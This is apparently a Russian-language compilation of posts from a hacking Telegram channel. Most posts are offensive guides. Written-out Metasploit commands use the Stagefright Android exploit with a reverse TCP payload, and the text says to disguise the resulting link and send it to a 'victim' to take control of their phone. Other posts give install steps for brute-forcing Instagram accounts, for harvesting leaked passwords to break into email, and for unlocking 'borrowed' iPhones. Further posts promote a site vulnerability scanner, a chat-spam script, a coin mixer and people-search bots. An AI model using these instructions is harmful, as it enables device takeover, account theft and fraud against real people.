Создаем фейковые контакты

Огромное количество приложений и сервисов ежедневно собирают ваши персональные данные чтобы их использовать либо же продавать. Одна из приоритетных целей таких компаний - это получение контактов из записной книжки пользователей.

Fake Contacts — это приложение с открытым исходным кодом опубликованным на Github. Данный софт создает поддельные контакты, тем самым "отравляя" собираемые данные недоброжелательными компаниями.

Таким образом, вы сможете сохранить анонимность и приватность.

​Получаем доступ к телефону

В данном посте мы поговорим о том, как при помощи всего-лишь одной ссылки получить полный контроль над чужим устройством.

Поможет нам в этом специальная утилита Metasploit, которая прекрасно справляется с уязвимостями Android старых версий.

Приступим:

1. Первым делом устанавливаем нашу утилиту в Termux:
update
apt upgrade
pkg install unstable-repo
pkg install metasploit
2. После этого запускаем утилиту:
3. Теперь, если Stagefright нет в Metasploit, то скачиваем его отсюда → ТЫК ←  и перекидываем в папку с эксплоитами.
4. После этого прописываем:
msfconsole — открытие консоли
use exploit/android/browser/stagefrightmp4tx3g64bit — подключение эксплоита
set SRVHOST вашIP
URIPATH /
set PAYLOAD linux/armle/mettle/reversetcp
set LHOST вашIP
set VERBOSE true
exploit -j — запуск эксплоита

Для нас сгенерируется специальная ссылка.  Заворачиваем её в ngrok, по желанию маскируем и отправляем жертве под любым предлогом. Когда жертва по ней перейдёт, мы получим удалённый доступ к устройству.

​Полезные сервисы для работы

При осуществлении какой-либо деятельности в инете, обычно мы используем множество инструментов для достижения цели: редакторы, почты и т.п. Порой их использование осуществляется крайне неудобным образом, когда за каждым инструментом нам приходится лезть в отдельные памятки, заметки или приложения.

В данном посте мы поделимся с Вами несколькими сервисами первой необходимости, которые в значительной мере оптимизируют выполняемые Вами действия и позволят выполнять любую работу значительно быстрее. Помимо этого, некоторые из этих сервисов способны заменить ограниченные ресурсы, которые мы также используем в работе.

Список:

1. Получаем одноразовые почты → ТЫК ←
2. Получаем одноразовые номера → ТЫК ←
3. Генерируем фейк-аккаунты, переписки, личности → ТЫК ←
4. Онлайн-фотошоп → ТЫК ←
5. Создание простеньких сайтов для чайников → ТЫК ←
6. Анализ поисковых запросов в Google → ТЫК ←
7. Трекер для поисковых запросов → ТЫК ←

#Обучение
Как ботнеты на базе IoT используют для DDoS-атак

#Обучение
Прослушка и перехват СМС. Теория и практика.
Часть 1

#Обучение
Протокол TCP: что нужно знать специалисту по анализу сетевого трафика!

​Брутфорс Instagram аккаунтов с помощью Termux

Brutegram — утилита для проведения брутфорс атак на инстаграм аккаунты. Рекомендуется применять только в том случае, если жертва невосприимчива к фишингу.


Установка

$ apt update && apt upgrade
$ apt install python python2 git jq
$ pip2 install requests mechanize
$ git clone https://github.com/Err0r-ICA/Brutegram
$ cd Brutegram

Запуск

$ bash Brutegram

Хакинг в хату ✌️

Со 100$ до 1000$ за 1 месяц

​​​​​​Взлом почты

H8Mail - утилита способна прогнать нужную вам почту по своим базам и выдает некоторое кол-во паролей, С ее помощью можно получить доступ не только к почтовому ящику, а вообще ко всем аккаунтам, если пользователь использует одни и те же пароли.

Установка:
$ apt update -y & pkg upgrade -y
$ pkg install git python
$ pip install requests
$ pip install h8mail

Использование:
$ h8mail -t почта

За минуту утилита прогонит почту по своим базам и если она где-то засветилась в слитых БД, то вы получите положительный результат.

#защита

Как разблокировать iPhone, не имея пароля?

Забыли вы пароль, или же «одолжили» гаджет и хотите получить к нему доступ — это не важно. На помощь придёт приложение FoneLab iOS UnlockerFoneLab iOS Unlocker.

1⃣ Установите программу на ПК, после чего подключите айфон к нему.

2⃣ Выберите «Wipe Passcode».

3⃣ Укажите информацию об iPhone, после чего нажмите «Start».

Blender.io - лучший анонимный миксер

#Обучение
Мошенническое программное обеспечение (crimeware): глубокое погружение в Emotet

Подборка телеграм ботов, которые нужно закрепить в избранных сообщениях👌

@VoiceToPhoneBot ← может озвучивать текст шестью разными голосами. Есть платная функция анонимного звонка и озвучкой вашего текста ботом.

@SatanAss_bot ← позволяет осуществлять поиск по телефону и по фотографиям в социальных сетях.

@tik_vid_bot ← скачивает видео из TikTok без водяного знака.

@YTAudioDownloadBot ← достает аудиодорожку из любого видео на ютубе.

@flibustafreebookbot ← бот который ищет книги по библиотеке Flibusta (не работает на IOS).

@RoundDFBot ← переносит мимику а также отдельные части лица на тело другого человека.

@siteshot_bot ← для создания веб-скриншотов.

@GmailBot ← официальный почтовый клиент Gmail.

​Мощный инструмент для хакинга

Всем привет.
Cегодня я хочу показать вам jxtym интересный инструмент, он создан для ленивых и любознательных, с помощью него вы сможете не только узнать на каком движке стоит сайт, но и узнать его уязвимости, а также получить ссылки на эти уязвимости.

Установка:
▪️apt install git
▪️git clone https://github.com/Moham3dRiahi/XAttacker.git
▪️cd XAttacker
▪️chmod +x termux-install.sh
▪️bash termux-install.sh

Использование:
▪️perl XAttacker.pl - запуск
▪️perl XAttacker.pl -l list.txt - если есть список веб-сайтов
▪️perl XAttacker.pl -multi - включить многопоточность
Более подробно читайте на GitHub.

#скрипт #хакинг

Скрипт спам по всем чатам, которые есть на аккаунте

Написан на питоне, библиотека - telethon.
В избранном сохраняем текст, бот его будет кидать по чатам.

@Social_Engineering — Самый крупный ресурс в Telegram, посвященный Хакингу и Cоциальной Инженерии.

CalyxOS: лучший способ очистить Android от следов Google

Android Open Source Project — свободный проект. Однако в него очень глубоко проникла корпорация Google. К сожалению, всё больше API и библиотек Android теперь доступны только на смартфонах с предустановленными приложениями Google Apps (GApps). В данной статье будут показаны замены GApps.

https://teletype.in/@onehellsus/-a7DE57eTGP

Повышаем привилегии (XSS, LFI, Web-Shell)

Изучаем способы повышения привилегий.

https://teletype.in/@it_ha/HJhu2xmaN

Атака на промышленную IT-инфраструктуру

Сегодня рассмотрим базовый сценарий атаки на IT-инфраструктуру организации. В качестве цели может выступать что угодно: от пиццерии до банков.

https://teletype.in/@onehellsus/yVIyg9cMqt7